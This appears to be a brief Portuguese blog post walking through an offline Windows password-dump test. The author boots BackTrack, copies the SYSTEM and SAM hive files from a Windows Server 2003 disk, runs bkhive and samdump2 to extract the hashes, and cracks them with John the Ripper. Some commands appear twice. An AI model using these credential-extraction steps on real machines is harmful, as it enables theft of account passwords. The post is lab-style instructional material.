Ferramenta interessante, com ela é possível gerar um "dump" de senhas de Sistemas Operacionais, abaixo os passos necessários, efetuei os testes em ambiente de teste, utilizando o backTrack e o "alvo" foi um Sistema Operacional Windows Server 2003.
Efetuar boot com o backTrack ou similar, montar o disco local (comando mount), eu prefiro copiar via SCP os arquivos necessários (para uma outra máquina), que são system e SAM que estão disponíveis no seguinte caminho: /windows/system32/config/
# utilizar o bkhive para gerar o key.txt
#bkhive system key.txt
Utilizando o samdump2 para gerar um hash
#samdump2 SAM key.txt > hashes.txt
# utilizar o bkhive para gerar o key.txt
#bkhive system key.txt
Utilizando o samdump2 para gerar um hash
#samdump2 SAM key.txt > hashes.txt
Depois utilizar a ferramenta john para quebrar a senha
#/pentest/passwords/john/./john hashes.txt
Demorou cerca de 3 horas para a senha ser parcialmente quebrada, mas quebrar senhas do Windows não é uma tarefa simples, pois isso envolve tipos de autenticação (LAN Manager, NTLM, kerberos etc ), é um assunto muito interessante, vale a pena estudá-lo.
Nenhum comentário:
Postar um comentário